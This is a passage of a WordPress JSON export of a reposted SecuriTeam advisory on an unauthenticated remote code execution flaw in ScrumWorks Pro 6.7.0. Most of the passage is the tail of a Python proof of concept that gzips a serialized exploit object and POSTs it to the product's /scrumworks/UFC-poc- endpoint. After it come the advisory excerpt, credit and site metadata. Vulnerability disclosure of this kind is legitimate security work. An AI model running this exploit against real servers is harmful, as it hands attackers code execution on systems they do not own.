class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getObject<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-40\">&nbsp;<\/div>\n<div 
class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-41\"><span class=\"crayon-p\"># create streams<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-42\"><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ByteArrayOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-43\"><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GZIPOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-44\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ObjectOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-45\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writeObject<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exploitObject<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-47\"><span class=\"crayon-p\"># close streams<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-48\"><span class=\"crayon-v\">objectStream<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">flush<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-49\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-50\"><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-51\"><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-53\"><span class=\"crayon-p\"># http request<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-54\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;sending serialized command&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-55\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">httplib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">HTTPConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-56\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;POST&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/scrumworks\/UFC-poc-&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toByteArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-57\"><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getresponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-58\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-599cade9cd2a7048494444-59\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;done&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-60\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3387\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 22 Aug 2017 05:22:12 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a remote code execution vulnerability found in ScrumWorks Pro version 6.7.0. &#8220;CollabNet ScrumWorks Pro is an Agile Project Management for Developers, Scrum Masters, and Business&#8221;. 
A trial version can be downloaded from the vendor: https:\/\/www.collab.net\/products\/scrumworks Credit A security researcher from, Siberas, has reported this vulnerability to Beyond Security\u2019s SecuriTeam &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3387\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 ScrumWorks Pro Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-8870","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8870"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8870\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8870"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8870"}],"curies":[{"name":"wp","hre
f":"https:\/\/api.w.org\/{rel}","templated":true}]}}